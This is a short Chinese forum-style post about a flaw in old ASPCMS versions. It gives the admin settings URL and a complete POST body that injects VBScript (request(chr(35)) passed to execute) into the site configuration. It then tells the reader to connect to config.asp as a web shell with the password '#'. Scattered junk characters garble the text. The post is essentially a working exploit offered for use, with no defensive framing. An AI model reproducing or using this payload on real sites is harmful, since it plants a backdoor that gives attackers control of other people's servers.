老的ASPCMS版本的秒杀拿SHELL漏洞
" n0 s6 Y# ^7 S% \* n& x) b6 U7 m2 S4 e
找到后台。。。然后) d* `8 x$ [ M. k: Q
9 B: W$ V; ~, ~) k1 w/admin/_system/AspCms_SiteSetting.asp?action=saves
8 R7 x# h& z6 y' m: y( _+ { ) E& \% s8 ^* j! T
直接POST
6 p. W( h. W1 U, ?$ O 2 f" T! s" k& h# @/ R) X j4 Q7 z
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=17 V+ g7 l! p; [' {
" _/ n' A& u$ ^8 _再连接配置文件config.asp 密码为#, A& {( }& |6 Z0 w1 k
|